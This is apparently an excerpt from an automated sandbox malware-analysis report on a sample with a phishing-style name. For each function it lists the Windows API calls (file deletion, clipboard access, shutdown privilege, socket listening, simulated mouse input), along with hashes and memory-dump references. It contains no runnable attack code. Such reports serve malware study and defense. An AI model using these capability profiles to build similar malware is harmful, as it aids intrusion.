                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                    • API String ID: 3830820486-3289030164
                                                                                                                    • Opcode ID: 37ceb1a3db8184f18f50321b53ff2bd246a59aef8ab4eb5195d210f17433fb1e
                                                                                                                    • Instruction ID: a3c528f4309eb931faf97f56d960552d1edd3819ee3f5fd56c519c0752b9aa79
                                                                                                                    • Opcode Fuzzy Hash: 37ceb1a3db8184f18f50321b53ff2bd246a59aef8ab4eb5195d210f17433fb1e
                                                                                                                    • Instruction Fuzzy Hash: 24D14072508300AEC714EBA4DC91EEBB7ECAF88704F44491DF585D7191EB78DA48DBA2
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00F89663
                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00F896A1
                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00F896BB
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F896D3
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00F896DE
                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00F896FA
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F8974A
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00FD6B7C), ref: 00F89768
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F89772
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00F8977F
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00F8978F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1409584000-438819550
                                                                                                                    • Opcode ID: abe225f7383ba20f00f7384ea6b6f4bcdf711830e46962cc63d157ad854204f6
                                                                                                                    • Instruction ID: 30982d149637369aecd6eb03cf89c65885842e9e1f44a758bfef093a3e5d6029
                                                                                                                    • Opcode Fuzzy Hash: abe225f7383ba20f00f7384ea6b6f4bcdf711830e46962cc63d157ad854204f6
                                                                                                                    • Instruction Fuzzy Hash: 8831C3729042196ADF10AFB4DC08AEE77AC9F4A330F184156F815E21A0EB74DE40AB64
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00F897BE
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F89819
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00F89824
                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00F89840
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F89890
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00FD6B7C), ref: 00F898AE
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F898B8
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00F898C5
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00F898D5
                                                                                                                      • Part of subcall function 00F7DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F7DB00
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 2640511053-438819550
                                                                                                                    • Opcode ID: 84478d7b02675e68fd4e56005578043a06125f77c139f72fdd22ea9ec99f051f
                                                                                                                    • Instruction ID: 3546caae4ab36c7322281659a151a232119e9eab4564cf27627227bbc9475322
                                                                                                                    • Opcode Fuzzy Hash: 84478d7b02675e68fd4e56005578043a06125f77c139f72fdd22ea9ec99f051f
                                                                                                                    • Instruction Fuzzy Hash: DA31A37290461A6EDF10BFB4DC48AEE77AC9F46334F584156E814E21A0DBB4DE44EB60
APIs
• GetLocalTime.KERNEL32(?), ref: 00F88257
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00F88267
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F88273
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F88310
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F88324
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F88356
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F8838C
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F88395
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local$System
• String ID: *.*
• API String ID: 1464919966-438819550
• Opcode ID: 86463a0f87019d8482a1a76aa71e7ee5d46c68496a9b52977904d161bd80a254
• Instruction ID: e04bfd8c704ab5405b3ad6e3a424402e8e83a966c9f3c2b4923d10a5c7723323
• Opcode Fuzzy Hash: 86463a0f87019d8482a1a76aa71e7ee5d46c68496a9b52977904d161bd80a254
• Instruction Fuzzy Hash: A2615BB25043059FCB10EF64C84499EB3E9FF89360F44891EF98987251EB35E946DB92
APIs
  • Part of subcall function 00F13AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F13A97,?,?,00F12E7F,?,?,?,00000000), ref: 00F13AC2
  • Part of subcall function 00F7E199: GetFileAttributesW.KERNEL32(?,00F7CF95), ref: 00F7E19A
• FindFirstFileW.KERNEL32(?,?), ref: 00F7D122
• DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00F7D1DD
• MoveFileW.KERNEL32(?,?), ref: 00F7D1F0
• DeleteFileW.KERNEL32(?,?,?,?), ref: 00F7D20D
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00F7D237
  • Part of subcall function 00F7D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00F7D21C,?,?), ref: 00F7D2B2
• FindClose.KERNEL32(00000000,?,?,?), ref: 00F7D253
• FindClose.KERNEL32(00000000), ref: 00F7D264
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 1946585618-1173974218
• Opcode ID: f6dae162abc41bcf3d101d36a273cd16b8f3ea496aa0ada3e744f760e158c248
• Instruction ID: a5e34854a9ba7e34fc1cbf11fa12212be3a4ceefbb91f91ac0290d5c650f9207
• Opcode Fuzzy Hash: f6dae162abc41bcf3d101d36a273cd16b8f3ea496aa0ada3e744f760e158c248
• Instruction Fuzzy Hash: B1618F71C0510D9ACF05EBE0CD529EDB7B5AF15310FA48066E406B7192EB346F4AEBA1
APIs
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
• Opcode ID: c8345da6347a9fee01f9f4a10a019af9c9a3f77ef2e71c99c620aec145ea2e31
• Instruction ID: 0662c757a048f5a8ba1c2b4784c924e15538fd21bed35469c4ac288a58da2ae8
• Opcode Fuzzy Hash: c8345da6347a9fee01f9f4a10a019af9c9a3f77ef2e71c99c620aec145ea2e31
• Instruction Fuzzy Hash: 2D41AB75604611AFE320EF15D888B99BBE1FF45328F15C099E4198B7A2C735EC42EBD0
APIs
  • Part of subcall function 00F716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F7170D
  • Part of subcall function 00F716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F7173A
  • Part of subcall function 00F716C3: GetLastError.KERNEL32 ref: 00F7174A
• ExitWindowsEx.USER32(?,00000000), ref: 00F7E932
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $ $@$SeShutdownPrivilege
• API String ID: 2234035333-3163812486
• Opcode ID: b9c65f1c88f8f6aed5ecbe9fe498e4ab52d56939d8586f6072db527a31192a76
• Instruction ID: 2f43180bf7f2401d10ef85c1f5dcd9b9ec2a1cb15350829a4fcf6dfa0649efbb
• Opcode Fuzzy Hash: b9c65f1c88f8f6aed5ecbe9fe498e4ab52d56939d8586f6072db527a31192a76
• Instruction Fuzzy Hash: 03012B73A10214AFEB6426749C85BBB727CA718750F148463FA07E21D1D6645C40B2D2
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00F91276
• WSAGetLastError.WSOCK32 ref: 00F91283
• bind.WSOCK32(00000000,?,00000010), ref: 00F912BA
• WSAGetLastError.WSOCK32 ref: 00F912C5
• closesocket.WSOCK32(00000000), ref: 00F912F4
• listen.WSOCK32(00000000,00000005), ref: 00F91303
• WSAGetLastError.WSOCK32 ref: 00F9130D
• closesocket.WSOCK32(00000000), ref: 00F9133C
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: ErrorLast$closesocket$bindlistensocket
• String ID:
• API String ID: 540024437-0
• Opcode ID: b4a06e2b615e8a161ce99da1dedac1b14b12d1e7c3af4dce3d392e5a771608b0
• Instruction ID: e751cf3d82622caae5e7643065ecce5dfef0c37df448124e86f6600aff1c25cf
• Opcode Fuzzy Hash: b4a06e2b615e8a161ce99da1dedac1b14b12d1e7c3af4dce3d392e5a771608b0
• Instruction Fuzzy Hash: 2B41A471A001059FEB10EF24C488B69BBF6BF46328F188198D8568F2D6C775EC81DBE1
APIs
• _free.LIBCMT ref: 00F4B9D4
• _free.LIBCMT ref: 00F4B9F8
• _free.LIBCMT ref: 00F4BB7F
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00FB3700), ref: 00F4BB91
• WideCharToMultiByte.KERNEL32(00000000,00000000,00FE121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00F4BC09
• WideCharToMultiByte.KERNEL32(00000000,00000000,00FE1270,000000FF,?,0000003F,00000000,?), ref: 00F4BC36
• _free.LIBCMT ref: 00F4BD4B
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: _free$ByteCharMultiWide$InformationTimeZone
• String ID:
• API String ID: 314583886-0
• Opcode ID: d1370393a6d74236c1fc077c50b8fc252e60fbd37317ac6ba056cff4079dd45d
• Instruction ID: ee5b4c34ef0ceda141c4fec90fc892d0e77906839d373af4d6c2ea5651f189aa
• Opcode Fuzzy Hash: d1370393a6d74236c1fc077c50b8fc252e60fbd37317ac6ba056cff4079dd45d
• Instruction Fuzzy Hash: FAC10571E04249AFDB209F698C81BAA7FB9EF41320F14419AED90DB253EB34DE41B750
APIs
  • Part of subcall function 00F13AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F13A97,?,?,00F12E7F,?,?,?,00000000), ref: 00F13AC2
  • Part of subcall function 00F7E199: GetFileAttributesW.KERNEL32(?,00F7CF95), ref: 00F7E19A
• FindFirstFileW.KERNEL32(?,?), ref: 00F7D420
• DeleteFileW.KERNEL32(?,?,?,?), ref: 00F7D470
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00F7D481
• FindClose.KERNEL32(00000000), ref: 00F7D498
• FindClose.KERNEL32(00000000), ref: 00F7D4A1
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
• Opcode ID: bf173f75b45fe70e3f8a0487e2ff05996368048b44ea09d8d1b955f7c0320291
• Instruction ID: 04334f842756f49a99e5088c143a72eb11aef5816604cfaec261dc042313041e
• Opcode Fuzzy Hash: bf173f75b45fe70e3f8a0487e2ff05996368048b44ea09d8d1b955f7c0320291
• Instruction Fuzzy Hash: A73190710083459BC304EF64CC519EFB7E8AE92314F848A1EF4D593191EB34AA49EBA3
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
• Opcode ID: 32df9c12351c7f1a9c3365fdb991465147fe2743cf45a177df49d71ecb6f43f0
• Instruction ID: b7665c229070ef32eef16451079936b7a431c2ab7588c134a7705dd9b171501d
• Opcode Fuzzy Hash: 32df9c12351c7f1a9c3365fdb991465147fe2743cf45a177df49d71ecb6f43f0
• Instruction Fuzzy Hash: ACC23B72E046288FDB25CE28DD407EABBB5FB84315F1541EAD84DE7240E778AE859F40
APIs
• _wcslen.LIBCMT ref: 00F864DC
• CoInitialize.OLE32(00000000), ref: 00F86639
• CoCreateInstance.OLE32(00FAFCF8,00000000,00000001,00FAFB68,?), ref: 00F86650
• CoUninitialize.OLE32 ref: 00F868D4
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: 504f754559eb83b913bda27282ecc79ed04c87d0c423d0f5336c7399a53630e9
• Instruction ID: e1573bdb9b454a334bb33ad57cee9a520a69e33b30388074c21694e32b58f334
• Opcode Fuzzy Hash: 504f754559eb83b913bda27282ecc79ed04c87d0c423d0f5336c7399a53630e9
• Instruction Fuzzy Hash: 31D15971508301AFC304EF24C891AABB7E8FF98714F04496DF595CB291EB74E949DBA2
APIs
• GetForegroundWindow.USER32(?,?,00000000), ref: 00F922E8
  • Part of subcall function 00F8E4EC: GetWindowRect.USER32(?,?), ref: 00F8E504
• GetDesktopWindow.USER32 ref: 00F92312
• GetWindowRect.USER32(00000000), ref: 00F92319
• mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00F92355
• GetCursorPos.USER32(?), ref: 00F92381
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F923DF
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForeground
• String ID:
• API String ID: 2387181109-0
• Opcode ID: f138b892ee6b0ca1c9a693b696b445c710208ba6a8245b9ace561d3c26547457
• Instruction ID: a312c033bdeba653701527bbb9193155db2a33f4ad8e8ad5fdfb1f3b1c6d10a8
• Opcode Fuzzy Hash: f138b892ee6b0ca1c9a693b696b445c710208ba6a8245b9ace561d3c26547457
• Instruction Fuzzy Hash: A2319E72905319AFDB20DF54C849E5BB7A9FF89314F00091AF98997191DB34E908DB92
APIs
  • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
• FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00F89B78
• FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00F89C8B
  • Part of subcall function 00F83874: GetInputState.USER32 ref: 00F838CB
  • Part of subcall function 00F83874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F83966
• Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00F89BA8
• FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00F89C75
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
• String ID: *.*
• API String ID: 1972594611-438819550
• Opcode ID: 51f8cd909850be78c5b130b94d843bf6d226d3ce3bd118df6e468693130526b0
• Instruction ID: 121f36306c4bcbf7714ed9d163cae25b312a90738dd630cbd45ca75039839214
• Opcode Fuzzy Hash: 51f8cd909850be78c5b130b94d843bf6d226d3ce3bd118df6e468693130526b0
• Instruction Fuzzy Hash: 0B418371D0420A9FCF15EF64CC45AEE7BF4EF46320F144056E815A2191EB759E84EFA1
APIs
  • Part of subcall function 00F29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F29BB2
• DefDlgProcW.USER32(?,?,?,?,?), ref: 00F29A4E
• GetSysColor.USER32(0000000F), ref: 00F29B23
• SetBkColor.GDI32(?,00000000), ref: 00F29B36
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Color$LongProcWindow
• String ID:
• API String ID: 3131106179-0
• Opcode ID: 6ed705caf61efac0058ade3ab9fa9bbbb2352131a1226811d4c8441af9b1a6a7
• Instruction ID: ef3bb4e62abb77f3b3e90a9a44f44158690e0c0478094988d0d3f19093474022
• Opcode Fuzzy Hash: 6ed705caf61efac0058ade3ab9fa9bbbb2352131a1226811d4c8441af9b1a6a7
• Instruction Fuzzy Hash: 8FA14BB190C264AEE724AA3DAC98F7F369DEF43364F140119F402C7591CAAD9D41F671
APIs
  • Part of subcall function 00F9304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F9307A
  • Part of subcall function 00F9304E: _wcslen.LIBCMT ref: 00F9309B
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F9185D
• WSAGetLastError.WSOCK32 ref: 00F91884
• bind.WSOCK32(00000000,?,00000010), ref: 00F918DB
• WSAGetLastError.WSOCK32 ref: 00F918E6
• closesocket.WSOCK32(00000000), ref: 00F91915
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
• String ID:
• API String ID: 1601658205-0
• Opcode ID: 3d192cc2732d328d40e652eb338affaa75268ca936c56e76f47954f5a63310e0
• Instruction ID: 671626fee31d92be16a7df21cd083a90604f64586f56388de2e500f28422862d
• Opcode Fuzzy Hash: 3d192cc2732d328d40e652eb338affaa75268ca936c56e76f47954f5a63310e0
• Instruction Fuzzy Hash: 6851B471A002109FEB10EF24D886F6A77E5AB45718F088058F9159F3D3DB75AD41EBE1
APIs
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: b71fe456defea251c41baf48f606f4e8b3f8726e879aef913f541142bbf38ca5
• Instruction ID: cc752b148cebdafac3f3bfba254acc7513a1180aea588a84bbfc930f4a9bf419
• Opcode Fuzzy Hash: b71fe456defea251c41baf48f606f4e8b3f8726e879aef913f541142bbf38ca5
